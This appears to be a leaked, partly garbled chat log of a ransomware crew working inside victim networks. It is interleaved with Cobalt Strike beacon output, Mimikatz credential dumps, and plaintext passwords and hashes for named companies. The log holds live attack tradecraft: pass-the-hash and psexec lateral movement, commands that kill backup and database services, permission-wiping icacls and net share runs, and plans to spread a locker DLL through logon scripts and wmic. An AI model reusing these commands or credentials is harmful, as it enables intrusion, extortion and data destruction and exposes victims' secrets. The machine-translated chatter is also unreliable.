16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f ssp : credman : Authentication Id : 0 ; 97351 (00000000:00017c47) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 10/6/2020 6:55:40 AM SID : S-1-5-96-0-1 msv : [00000003] Primary * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a tspkg : wdigest : * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : L-7NB3HC2$ * Domain : telecomlabsinc.com * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f ssp : credman : Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : L-7NB3HC2$ Domain : TELECOMLABSINC Logon Server : (null) Logon Time : 10/6/2020 6:55:40 AM SID : 
S-1-5-20 msv : [00000003] Primary * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a tspkg : wdigest : * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : l-7nb3hc2$ * Domain : TELECOMLABSINC.COM * Password : (null) ssp : credman : Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 10/6/2020 6:55:39 AM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) * kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : credman : Authentication Id : 0 ; 66921 (00000000:00010569) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 10/6/2020 6:55:39 AM SID : S-1-5-96-0-0 msv : [00000003] Primary * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a tspkg : wdigest : * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : L-7NB3HC2$ * Domain : telecomlabsinc.com * Password : 49 69 69 a2 6a bd c5 80 d7 48 10 01 73 3e e4 3f 9e de 97 9c 9d 08 b6 ab e6 81 13 4c b3 13 d2 68 66 94 60 66 02 60 c1 ac fd 58 d7 72 dd 90 b8 eb fb 9c 92 de 97 59 cf 28 22 e4 f4 d5 b2 df 90 39 0d c9 16 c1 78 78 a8 69 96 10 f4 73 e6 77 d9 f8 64 96 53 33 e5 7b 25 15 e1 f4 4a 33 34 d0 5b 77 30 a9 93 a2 c5 ac c7 d1 cc b9 3d cb 68 dd d0 9a b3 be 83 ba 20 21 3c bc 8a 53 dc 78 3a 51 44 2e 29 9f e7 56 00 ed c1 d5 7a 5f a5 0e f2 a0 a5 e3 43 28 ee 74 1e 00 44 06 ba 4b 75 46 99 1e 09 9b 41 0f 7f ce ba bf 40 98 0b 9e 6e 55 4b e5 3a 35 fe 7f c0 cd 6e a2 85 b2 5d 86 ed 73 00 a3 fe c7 75 6b 2c 25 ca 25 27 4b 07 10 5e 23 68 79 73 16 89 9e 2f 96 17 3e 35 ba f5 f1 c2 ca f2 9b ec 2d 8f a9 4c 0a 12 07 0e 88 80 25 b7 ee 2e 1e 95 bb 0f ssp : 
credman : Authentication Id : 0 ; 65920 (00000000:00010180) Session : UndefinedLogonType from 0 User Name : (null) Domain : (null) Logon Server : (null) Logon Time : 10/6/2020 6:55:39 AM SID : msv : [00000003] Primary * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * NTLM : 0e974cf2252722b48baf65ee2f9db6e2e * SHA1 : 4dbdbdbf0c53cbb22db6b49aa49709974dd4c0ed94a tspkg : wdigest : kerberos : ssp : credman : Authentication Id : 0 ; 999 (00000000:000003e7) Session : UndefinedLogonType from 0 User Name : L-7NB3HC2$ Domain : TELECOMLABSINC Logon Server : (null) Logon Time : 10/6/2020 6:55:39 AM SID : S-1-5-18 msv : tspkg : wdigest : * Username : L-7NB3HC2$ * Domain : TELECOMLABSINC * Password : (null) kerberos : * Username : l-7nb3hc2$ * Domain : TELECOMLABSINC.COM * Password : (null) ssp : credman : beacon> net domain [*] Tasked beacon to run net domain [+] host called home, sent: 257 bytes ``I can't get to them on my desktop in browserox4proxy only from my ipi, as I understand it```. SSL VPN Address Https://173.12.52.229 System administrator Usrname/password dadmin/w3r3g00d SSl VPN user midawivpn/m1daw1vpn `````` ItemUrl : C:\Users\richards\Desktop\capture\World Vision - TomF\Managed Services_2011\Site Locations\Nashville\Continuant_Setup_TN-OR.doc FileOwner : TELECOMLABSINC\richards Size : 78848 DateCreated : 2/7/2020 3:11:15 PM DateAccessed : 2/7/2020 3:11:15 PM AutoSummary : Continuant MAP Service Location Remote Access Data Sheet World Vision - Nashville & Portland Critical Info Needed to Begin Monitoring Setup (ASAP) Call, email, or fax this critical info to PM listed below: Customer Business Name and Location: World Vision 277 Mallory Station Rd., Suite 130, Franklin, TN 37067 Switch Dialup Number: 192.168.242.98 Switch Login: continuant SEB Password (if installed) Switch Password: R3mot3! 
`````` ItemUrl : C:\Users\richards\Desktop\capture\World Vision - TomF\Managed Services_2011\Remote Access Information\Nortel-VPN-Login.txt FileOwner : TELECOMLABSINC\richards Size : 40 DateCreated : 2/7/2020 3:11:09 PM DateAccessed : 2/7/2020 3:11:09 PM AutoSummary : username : continuant password: e3nkq49v `````` Target : autologon.microsoftazuread-sso.com UserName : richards@continuant.com Password : MyW0rdPassW0rd! CredentialType : Generic PersistenceType : Enterprise LastWriteTime : 2/24/2020 11:30:58 AM ``Then you need to look for configurationsHours ago domain was responding, now it won't respondNet-GPPPassword seems to be down ``` [RESULT] Username: Administrator [RESULT] Changed: 2015-02-06 18:27:57 [RESULT] Password: $6t]:sw2@3ed `````` beacon> net domain [*] Tasked beacon to run net domain beacon> net domain_controllers [*] Tasked beacon to run net domain_controllers [+] host called home, sent: 87853 bytes [+] received output: telecomlabsinc.com [+] received output: Domain Controllers: [-] Error: 0 beacon> shell net localgroup Administrators [*] Tasked beacon to run: net localgroup Administrators [+] host called home, sent: 60 bytes [+] received output: Alias name Administrators Comment Administrators have complete and unrestricted access to the computer/domain Members ------------------------------------------------------------------------------- Administrator TELECOMLABSINC\Domain Admins TELECOMLABSINC\richards TOSA The command completed successfully. beacon> shell net group "Domain Admins" /dom [*] Tasked beacon to run: net group "Domain Admins" /dom [+] host called home, sent: 61 bytes [+] received output: The request will be processed at a domain controller for domain telecomlabsinc.com. 
Group name Domain Admins Comment Designated administrators of the domain Members ------------------------------------------------------------------------------- art.admin chrisma.admin daniel.admin MSSQL ServerAdmin$ sissel.admin svc_cisco_ldap The command completed successfully. beacon> shell net group "Enterprise Admins" /dom [*] Tasked beacon to run: net group "Enterprise Admins" /dom [+] host called home, sent: 65 bytes [+] received output: The request will be processed at a domain controller for domain telecomlabsinc.com. Group name Enterprise Admins Comment Designated administrators of the enterprise Members ------------------------------------------------------------------------------- chrisma.admin daniel.admin ServerAdmin$ The command completed successfully. Good night good night everybody remember to ask and help each other and also go home so as long as there are no questions still 20 min + approached the password I say sticky notes or something like that tomorrow by 3 so you in the water check their desktop on the rdp for notes on it2) if there are questions then ask1) take the archive with builds so the password will passThanks)not before 12 home, I hope you close one network at least) Merry Christmas!Merry Christmas to all!!! Tomorrow by 3:30 workpozapozavlya forgot that yesterday was a holidayWe merry Christmas to all) pure koba! 23.106.223.123 https://tagdel.com ---------------------------------------------------------------------------------------- 192.111.147.254:45008 RqwB6Sj9MH8NKzVrm9Xllv8uLBQWxZryhtM ``SIDH*G&8SDIGvS*DIF^*GSHIGUYRH``mailsniper works through the sameExchange administrator (i.e. 
member of "Exchange Organization Administrators" or "Organization Management" group)water path in the same network+- ExchangeOrganization Management in EAC the account with backup access should be in the group in other cases under the tops are directors, chief accountants, etc, If you can't back up everything, it could be that they just have their mail hosted, it's not that easy to download a backup, let me tell you about it.if it's not internal, it's external if there are no mail servers in the network, do we skip it? in evo have not yet found and it seems that it is not tor the main thing do not forget because in the account is stored information about the sessions, and you can obviously get there through the web1 network 1 account can leave or every time a new registrar?the question you take backups that waymaybe someone else read this dialogue today in #water-way @user8 learned how to download fat files from the network a couple of things who do not know i wait in the groups info from additional tasks as well give out +1 cobu prozapasyasya you will give 2 builds, if you reach the stage of closing you close at your discretion on reports and results in the confusa tomorrow I will not be, work independently on #waterway-com and on #rtpcompany-com finalize + additional tasks + lf you remember about the additional tasks on the networks?a couple of announcements so everyone distract yourselves it's waterwaypo rdp hooked up to harper and reading slack#ballymoregroup-com#evo-com#waterway-com #1-done-rtpcompany-com+so I take it we have four networks in the works? SCCY-DC.sccy.local TS.sccy.local SCCY-FS.sccy.local `````` www.sccy.com antivirus.sccy.com autodiscover.sccy.com host.sccy.com rd.sccy.com www.rd.sccy.com remote.sccy.com www.remote.sccy.com server.sccy.com server2.sccy.com store.sccy.com www.store.sccy.com ts.sccy.com www.ts.sccy.com ``http://10.0.0.4:5000/webman/login.cgi?enable_syno_token=yes''. 
setg Proxies socks4:209.222.101.167:1488 ``but they're sly foxes yes, there's been a fortune in it... and there's like a ntds taken down...`` https://connect.globaltranz.com/login?redir=%2Fng the first 3 are just not available? the first 2 seem to have got encrypted today in the last one where it was allowed to go in and wiped the rest too? beacon> shell dir \\\dcwas79.Wilsonart.com\D$ [*] Tasked beacon to run: dir \\dcwas79.Wilsonart.com\D$ [+] host called home, sent: 61 bytes [+] received output: The network path was not found. ``` ``` beacon> shell dir \\dcveeam01.Wilsonart.com\F$ [*] Tasked beacon to run: dir \\dcveeam01.Wilsonart.com\F$ [+] host called home, sent: 63 bytes [+] received output: The network path was not found. ``` ``` beacon> shell dir \\\bod01-bkp01.eu.Wilsonart.com\F$ [*] Tasked beacon to run: dir \\bod01-bkp01.eu.Wilsonart.com\F$ [+] host called home, sent: 68 bytes [+] received output: The network path was not found. ``` `nas_signature.polyrey.net` this one was wiped through the web face ``` beacon> shell dir \\BBDC03.bushboard.co.uk\C$ [*] Tasked beacon to run: dir \\BBDC03.bushboard.co.uk\C$ [+] host called home, sent: 62 bytes [+] received output: The network path was not found. ``That's how the slf.local fell off, they were pulled in.`` ``` beacon> shell dir \\192.168.3.8\C$\readme.txt [*] Tasked beacon to run: dir \\192.168.3.8\C$\readme.txt [+] received output: The specified network name is no longer available. ``` ``` beacon> shell dir \\192.168.3.7\C$\readme.txt [*] Tasked beacon to run: dir \\192.168.3.7\C$\readme.txt [+] host called home, sent: 62 bytes [+] received output: The specified network name is no longer available. 
and give me a lot more info from all domains that way. 2-3 files from file servers and backups will be enough, then I'm waiting for listings. Now the exe file on the workstations was released on the rest of the drives in this domain, only the DC came from somewhere else? Yeah, now even the buck will not let in; earlier I came in where there is no buck, it will not let in.
```
Share name                   Type  Used as  Comment
-------------------------------------------------------------------------------
ADMIN$                       Disk           Remote Admin
Bushboard Backups            Disk
C$                           Disk           Default share
E$                           Disk           Default share
F$                           Disk           Default share
IPC$                         IPC            Remote IPC
iTop-2.6.1-4463              Disk
log                          Disk
SQL_Server                   Disk
U$                           Disk           Default share
UpdateServicesPackages       Disk           A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
VBRCatalog                   Disk
vCenterBackups               Disk
WsusContent                  Disk           A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp                     Disk           A networ
```
not all of the shares. Didn't let me in? Where did it let me in - erasing Bushboard backups, I didn't touch it, so dir \\host\share\* /s > out.txt + you can take the backup file structures, then specify info about it somewhere. Did not let me in under DA; not all domains are alive. I couldn't tell you, did the sharing scheme work? I can't tell where it's not - I'm getting to some of the files that have been uploaded, they all crashed out at once. Workstations now, I'm checking. Stats are up. What about the workstations? They say you have 2-3 servers that are not working?
1.done.wilsonart.comok, from the neighboring try not checked, but it is better not to try, I do not know how the locker injected into one pid in two variants in general behaves[ ](https://mediaeveryone.com/group/wilsonart-com?msg=MaZfrEJ9pdfnTstjF) and so not from a separate session can? *trashbackup files are hard to restore and damaged easily enough ... but after rm it's better to dump the garbage anyway free space if you are already switched off to sleep and everything else is done - you can rm too =)so can rm ?)so you can dump the backups any way you want and don't want to get damaged without restoring them, because if they get a decryptor they will in any case restore the workstations and servers in their last state or use -nomutex flag from a "separate" sessionbut for that it is better to slow down the current process of blockingmay try right now by adding the path flag and -size 15 for example to corrupt 15% of files in the directory where backups are kept theoretically, you can set a locker on backups with -size flag to reduce corruptions percentage for speed reasons- even 10% is not enough- backups are encrypted for a long time- check hosts where sessions are dead after lock process start check and if all ok, go have a rest- so, if everything is started, 20 minutes asleep, have some breakfast and in 20 minutes do control check re-piping all hosts, see if new hosts have not declared, if the process is running correctly on all where it was started if there is huge data - and it will take a long time to do - delete what has not had time to crypto appear to them all fine, please check the files snapshots latching by hand snapshots in the sphere and did not happen) the server where snapshots were stored is locked by crypt is there a rdmi/snapshots deleted/encrypted? virtualization was found - snapshots were taken and flown to a backup on a win-server nasa was accessed, their disks were primed. 
backups were stored on vin servers superficially watching the case, tell me what is it with backups/nas/virtualization wait 20-30 minutes and do a manual check on all servers and armas about the re-injection got it the files just didn't show up ``` if a session did not die after the first injection, probably there is a file queue and you should be patient it means a segment delimitation with Cisk as the fv playing the role of re-injection the files didn't show up so you're trying to ping the host titty ``` who's that? ciscar? or isis? Bottom line: Wilsonart.com. srv: 125 (3 disks/nixes) / 128 arm: shared disks uk.Wilsonart.com srv: 22 / 22 arm: 44 / 44 eu.Wilsonart.com srv: 36 / 36 arm: 2 / 2 cn.Wilsonart.com srv: 1 / 1 WI.RWP.COM. srv: 27 / 31 (1 was not approached by admins, two did not have 445, 1 was not wind) arm: unshared SLF.LOCAL srv: 8 / 8 arm: 6 / 8 (repping occurred) resopal.lan srv: 26 arm: all shared ralpwilson.com srv: 1 / 1 polyrey.net srv: 52 / 53 (1 was not approached by admins) arm: 28 masked BUSHBOARD.CO.UK srv: 10 / 10 arm: 17 mashed up arborite.com srv: 9 / 9 arm: all armas are shared ``This could have unpredictable effects on file recovery if the flagwot is not written in time. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. [*] Manual DLL Inject - @tomcarver_ [+] host called home, sent: 222831 bytes [+] received output: Injected. ``This is not the way to do it. i see on some of the sessions, i'll prepare the status, everything works, then da mount yes run at once on this 2003 no vu some awful there is also e meets in this griddiskonnect incidentally often almost instantaneous and there were only C-drives? no more? 
well, will have to re-mount) there are many in the domains; do not stretch this in the same domain
```
Status       Local     Remote                    Network
-------------------------------------------------------------------------------
Disconnected L:        \\170.7.122.153\c$        Microsoft Windows Network
Disconnected M:        \\170.7.25.7\c$           Microsoft Windows Network
Disconnected N:        \\170.7.34.75\c$          Microsoft Windows Network
Disconnected O:        \\170.7.38.21\c$          Microsoft Windows Network
Disconnected P:        \\170.7.9.19\c$           Microsoft Windows Network
Disconnected Q:        \\170.7.183.5\c$          Microsoft Windows Network
Disconnected R:        \\170.7.5.11\c$           Microsoft Windows Network
Disconnected S:        \\170.7.24.25\c$          Microsoft Windows Network
Disconnected T:        \\170.7.123.166$          Microsoft Windows Network
Disconnected U:        \\170.7.76.123$           Microsoft Windows Network
Disconnected V:        \\170.7.121.129$          Microsoft Windows Network
Disconnected W:        \\170.7.183.97\c$         Microsoft Windows Network
Disconnected X:        \\170.7.183.84\c$         Microsoft Windows Network
Disconnected Y:        \\170.7.123.168$          Microsoft Windows Network
Disconnected Z:        \\170.7.123.224$          Microsoft Windows Network
```
what about the others?
```
170.7.20.230:445
170.7.2.30 not 445 here
170.7.110.205.
```
170.7.44.212:445 (platform: 500 version: 5.2 name: TNTAS03 domain: WI) then, in the dry residue, look at those where we do not have enough rights. If we miss something it is not fatal, but the lock should already start; let those hosts that are pulled in and mapped die. So tell me, for all the domains, what the statistics are and how many are not pulled in or not mapped. 172.22.190.10 172.22.190.11 10.40.60.50 I'm already confused by the name of this one, 170.7.2.30, and this one, 170.7.44.212:445; ping -a gave out this name, wi.rwp.com, so the domain name means they are in a WI domain of some kind.
```
TNTAS03.WI.RWP.COM
hqtov02.WI.RWP.COM
```
```
Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:55:00> shell net use * \\172.25.168.150\C$
[*] Tasked beacon to run: net use * \\172.25.168.150\C$
[+] host called home, sent: 60 bytes
[+] received output:
The password is not valid for \\172.25.168.150\C$. Enter the user name for '172.25.168.150':
(original output in French: Le mot de passe n'est pas valide pour \\172.25.168.150\C$. Entrez le nom d'utilisateur de '172.25.168.150':)
```
I tried with different tokens, none is good with this dnshostname. As long as they are domain hosts, they should not be in adc; they are not in adcom. tntas01 / tntas02 hqtov01 maybe there.
```
hqtov02.rwp.com [170.7.2.30]
tntas03.rwp.com [170.7.44.212]
```
Look who the admins are there, I don't know... they have neighbors with the same hostname that the admins don't pass, two or more.
```
170.7.20.198
170.7.14.22
170.7.120.225
170.7.20.103
172.25.168.89
```
Do these four with them. Well, exactly 170.7.20.230:443
```
Teemo[SCZEVMRDS05]Administrator */8456|2020Dec27 09:49:56> shell net use * \\172.25.170.69\C$
[*] Tasked beacon to run: net use * \\172.25.170.69\C$
[+] host called home, sent: 59 bytes
[+] received output:
System error 53 has occurred. The network path was not found.
(original output in French: L'erreur système 53 s'est produite. Le chemin réseau n'a pas été trouvé.)
```
There's no 170.7.110.205 in Tatar at all, it's 445.
170.7.20.230:445 `````` there is no such subnet here as admins, but only in another one in the main domain, the LA did not come through from there ``` have you tried the enterprise? is everything pulled up/administered? or are there any problems as well? i see, how are the others doing? these two do not connect to cmblogin, the first one is not in ad_compact ``` fltov02.rwp.com [170.7.20.230] hqtas28.wilsonart.com [170.7.110.205] ``` here didn't pass as YES admins, and this subnet is only in another one in the main domain, LA didn't pass from there ``` hqtov02.rwp.com [170.7.2.30] tntas03.rwp.com [170.7.44.212] ``pth resopal.lan\admig 4654a6461da41310e51da91aaa7011da including local admin to re-check the kredna pack the rest can you smb_login the othersDAfowlerhas the others pulled up? or just from another point? the others have pulled up on these while I am going through YES `` 170.7.20.230 - 170.7.2.30 - 170.7.110.205 - 170.7.44.212 - ```Administrator:500:aad3b435b51404eeaad3b435b51404ee:2caf37093fda2e2d172732487707cd31::: 170.7.5.* for example i would try the server local admin from servers which are in the same subnet how many you have left? maybe under the other will be under this yes no kayfiz under yes no right such things you just don't have rights to the ones you can't open. [-] could not open \170.7.20.230\c$*: [-] could not open \170.7.5.75\c$*: [-] could not open \170.7.2.30\c$*: [-] could not open \170.7.5.10\c$*: [-] could not open \170.7.76.123\c$*: [-] could not open \170.7.5.11\c$*: [-] could not open \170.7.110.205\$*: [+] established link to child beacon: 170.7.110.16 [+] established link to child beacon: 170.7.10.204 [+] established link to child beacon: 170.7.41.213 [-] could not open \170.7.44.212.{\c$\*:because it's not finished yet for these binary binary generated by bind pipes, artifact doesn't work while it doesn't work under swtz, but it's about service creation (only if it's not done) @tl2 don't you just use new artifact? 
170.7.41.214 - 170.7.55.114 - 170.7.20.230 - 170.7.5.75 - 170.7.2.30 - 170.7.5.10 - 170.7.76.123 - 170.7.5.11 - 170.7.110.205 - 170.7.110.16 - 170.7.10.204 - 170.7.41.213 - 170.7.44.212 - `````` beacon> jump psexec 170.7.5.10 smb [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.5.10 via Service Control Manager (\\170.7.5.10\ADMIN$\56b5cb5.exe) [+] host called home, sent: 287642 bytes [-] could not upload file: 5 [-] Could not open service control manager on 170.7.5.10: 5 [-] Could not connect to pipe: 2 which didn't connect, don't make a screenshot, make a list of hosts i had an error with the same host i don't know what to say :-)check my log 1908 with which pead? everything works...well... [beacon> jump psexec 170.7.41.214 smb [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\msagent_15) on 170.7.41.214 via Service Control Manager (\170.7.41.214\ADMIN$\16e208c.exe) [+] host called home, sent: 287736 bytes [+] received output: Started service 16e208c on 170.7.41.214 [+] established link to child beacon: 170.7.41.214 That's what I meant about the disk ball ``` C:/Windows\system32\net1 stop samss /y C:Windows\system32/net1 stop veeamcatalogsvc /y C:Windows\system32/net1 stop veeamcloudsvc /y C:Windows\system32/net1 stop veeamdeploysvc /y C:Windows\System32/net.exe stop samss /y C:Windows\System32/net.exe stop veeamcatalogsvc /y C:Windows\System32/net.exe stop veeamcloudsvc /y C:Windows\System32/net.exe stop veeamdeploysvc /y C:³Windows\System32\taskkill.exe /IM sqlbrowser.exe /F C:Windows\System32\taskkill.exe /IM sqlceip.exe /F C:{Windows\System32\taskkill.exe /IM sqlservr.exe /F C:{Windows\System32\taskkill.exe /IM sqlwriter.exe /F C:{Windows\System32\taskkill.exe /IM veeam.backup.agent.configurations.exe /F C:\Windows\System32\taskkill.exe /IM veeam.backup.brokerservice.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.catalogdataservice.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.cloudservice.exe /F 
C:³Windows\System32\taskkill.exe /IM veeam.backup.externalinfrastructure.dbprovider.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.manager.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.mountservice.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.service.exe /F C:³Windows\System32\taskkill.exe /IM veeam.backup.uiserver.exe /F C:Windows\System32\taskkill.exe /IM veeam.backup.wmiserver.exe /F C:{Windows\System32\taskkill.exe /IM veeamdeploymentsvc.exe /F C:{Windows\System32\taskkill.exe /IM veeamfilesysvsssvc.exe /F C:\Windows\System32\taskkill.exe /IM veeam.guest.interaction.proxy.exe /F C:\Windows\System32\taskkill.exe /IM veeamnfssvc.exe /F C:³Windows\System32\taskkill.exe /IM veeamtransportsvc.exe /F C:{Windows\system32\taskmgr.exe /4 C:\Windows\system32\wbem\wmiprvse.exe -Embedding C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding net share c=c: /grant:everyone,full net share d=d: /grant:everyone,full net share e=e: /grant:everyone,full net share f=f: /grant:everyone,full net share g=g: /grant:everyone,full net share h=h: /grant:everyone,full net share i=i: /grant:everyone,full net share j=j: /grant:everyone,full net share k=k: /grant:everyone,full net share l=l: /grant:everyone,full net share m=m: /grant:everyone,full net share n=n: /grant:everyone,full net share o=o: /grant:everyone,full net share p=p: /grant:everyone,full net share q=q: /grant:everyone,full net share r=r: /grant:everyone,full net share s=s: /grant:everyone,full net share t=t: /grant:everyone,full net share u=u: /grant:everyone,full net share w=w: /grant:everyone,full net share v=v: /grant:everyone,full net share x=x: /grant:everyone,full net share y=y: /grant:everyone,full net share z=z: /grant:everyone,full icacls C:\* /grant Everyone:F /T /C /Q icacls D:\* /grant Everyone:F /T /C /Q icacls E:\* /grant Everyone:F /T /C /Q icacls F:\* /grant Everyone:F /T /C /Q icacls G:\* /grant Everyone:F /T /C /Q icacls H:\* /grant Everyone:F /T /C /Q icacls I:\* /grant 
Everyone:F /T /C /Q icacls J:\* /grant Everyone:F /T /C /Q icacls K:\* /grant Everyone:F /T /C /Q icacls L:\* /grant Everyone:F /T /C /Q icacls M:\* /grant Everyone:F /T /C /Q icacls N:\* /grant Everyone:F /T /C /Q icacls O:\* /grant Everyone:F /T /C /Q icacls P:\* /grant Everyone:F /T /C /Q icacls Q:\* /grant Everyone:F /T /C /Q icacls R:\* /grant Everyone:F /T /C /Q icacls S:\* /grant Everyone:F /T /C /Q icacls T:\* /grant Everyone:F /T /C /Q icacls U:\* /grant Everyone:F /T /C /Q icacls V:\* /grant Everyone:F /T /C /Q icacls W:\* /grant Everyone:F /T /C /Q icacls X:\* /grant Everyone:F /T /C /Q icacls Y:\* /grant Everyone:F /T /C /Q icacls Z:\* /grant Everyone:F /T /C /Q ``The error was the same, but the conclusion sailed away,`` the disks were scrambling,`` the servers were dragging,`` the servers were dragging,`` 908. 104.194.10.161:53256 KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi ```о just in time) so what's up? let me see for myself tell me what session yes tokenblin give me access to the server where you're working with the domain what about it dllkapo https is not jumping on the case so it blames on the sharingvot error on top of what blames? you rubbed aver ... you were just shredding with anwer... it shouldn't be a bindpipe... but the cmb is bindpipe... try the servers that are not bindpipe-attracted... it's all cmb-attracted... and the servers that are dell-pipe... it says when we try to share disks on the armas... Win32 Error: The process cannot access the file because it is being used by another process. ``Snow the skinoon is shitting with an error only through smb through delki and httpsc.wilsonart.com\-admin-bownem 361ab72479515c09284591c50cebfe23 how is it not shitting? If you already have domain mapped, can we just lock the domains we already have? ``` yes, you can at once@tl2 @tl1 those domains that are already primatted and attracted can we lock immediately ? cJZw4bgWNBuYAeLXToHzNLYZOqnTS8CJwIe` logn: fowlerh@wilsonart.com pass: R3f1nn3j2! 
Wilsonart.com\Administrator DA {}wallC2013 Wilsonart.com\roeders DA Dell@2020 but i don't have any clean ones(( try paiload to the ipi instead of the domainlit and more than 100k do not limit if the coba has a limit of 100k and a lot of servers come out do not knocka why? does not knock something somewhere? he supposed to come back if it does not shut down with the ends (it should @tl1 wait( i don't have @tl1@tl2 answer two clean coba? beacon> shell ping HQTAS37 [*] Tasked beacon to run: ping HQTAS37 [+] host called home, sent: 43 bytes [+] received output: Ping request could not find host HQTAS37. Please check the name and try again. ``` ``` beacon> shell ping HQTAS65 [*] Tasked beacon to run: ping HQTAS65 [+] host called home, sent: 43 bytes [+] received output: Ping request could not find host HQTAS65. Please check the name and try again. ´´but there is an isolated sabnet or something randomly pinged a little hands those who did not respond to the list from hell, hit the eheskoy, it came out only alive in the same sabnet where the disabled others pinged ok ? disconnected must be the other servers are not pinging because they are old/disconnected or there is no route to them? WI.RWP.COM srv: 31 / 60 arm: 122 / 515 Go to the root the root is always better from there for some reason)why not just put it in the root C ? ``` copy \DCWAS01\SYSVOL\Wilsonart.com\scripts\1.exe C:{\windows && C:\windows\1.exe ``Well, the locker does not seem to touch the executable files, in theory it should work)``Tried it, I just do not know if the current build encrypts logon scripts to be honest :smile:to know for surehttp://www://www/web/v78/logon_agent/la_configure_scriptspx#:text=In%20%20theGroup_scripts.websense.com/content/support/library/web/v78/logon_agent/la_configure_scripts.aspx#:~:text=In%20the%20Group%20Policy%20Management,Logon%20in%20the%20right%20pane.&text=In%20the%20Logon%20Properties%20window,Scripts\Logon\%20is%20displayed.and who tried something like this before? 
to come and finish it themselves so let's make a blank for the rest) not the fact that the domain authorization will fall off so by the time people come to the domain will fuck up. especially on weekends and holidays. it's Christmas they have a logon script, and how? and more additional tasks) then add copying and launching the locker to the logon scripts) and the ox isn't needed people will come to work, turn on the car and lock themselves in peace the date on armatures locks in minutes if not seconds ``Then readiness 10 min)`` and so on? builds dll lists and host lists have prepared themselves commands work in tempav + vindefrule av and start? snp no so well general alg, is to scatter batnik on shary disks from the armas to report by hand finishdana vmik and kopismozhet do rait errors?aha it is possible, but it is long, kapetspravdi threads ... they have a variant with a list of hosts + startup from systems + output and tdmb by the way in general take the same psek from the ms what to psek there? track the total errors?'nj nfr vj;yj ghbnzyenm cthdfrb yfghbvth `` copy %dll% \\\%1\admin$ wmic /node:%1 process call create "rundll32 c:\windows\%dll% entryPoint" Right? this gotch throws it in and runs it as a parameter. the batcnik throws it in and runs it[ ](https://mediaeveryone.com/group/wilsonart-com?msg=nsZeWcy8AxyCneT7n) .haven't made a batcnik yet. most likely?) most likely. what do we write in the batcnik? and run what? take an ip from the list, if it pings we call the batch, which takes the ip as a parameter. the batcnik throws it in and runs it. everything in the fucking streams. ``` 